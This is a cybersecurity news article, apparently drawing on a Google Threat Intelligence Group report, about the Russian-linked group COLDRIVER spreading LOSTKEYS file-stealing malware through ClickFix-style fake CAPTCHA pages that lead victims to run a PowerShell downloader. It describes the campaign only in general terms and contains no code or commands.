The Russian-linked hacking group COLDRIVER is ramping up its cyber espionage efforts by distributing a new malware strain known as LOSTKEYS. This malware operates through a sophisticated social engineering tactic that resembles the ClickFix method. According to the Google Threat Intelligence Group, LOSTKEYS has been observed targeting current and former advisors to Western governments, military personnel, journalists, think tanks, and non-governmental organizations (NGOs). Additionally, individuals linked to Ukraine have also been identified as potential targets.
LOSTKEYS is designed to steal files based on a predetermined list of file types and directories, while also gathering critical system information for the attackers. The malware was detected in attacks occurring in January, March, and April of 2025, as noted in a recent report by Google. Security researcher Wesley Shields detailed that COLDRIVER’s operation originally specialized in credential theft but has now expanded to include this advanced form of malware deployment.
COLDRIVER’s tactics have evolved from its initial credential phishing campaigns, diversifying into custom malware attacks. The latest operations begin with a fake CAPTCHA verification on a decoy website, where victims are then directed to execute a PowerShell command that downloads the malware from a remote server. The use of ClickFix is indicative of the group’s effort to refine its attack methods, with potential evasion of virtual machine detection being a key focus.
Reports indicate that this targeted deployment of LOSTKEYS is part of a broader trend, as other threat actors have also adopted the ClickFix strategy to distribute various malware types, including a banking trojan named Lampion and a macOS information stealer known as Atomic Stealer. The ClickFix technique’s continued popularity among cybercriminals underscores the importance of vigilance in cybersecurity practices.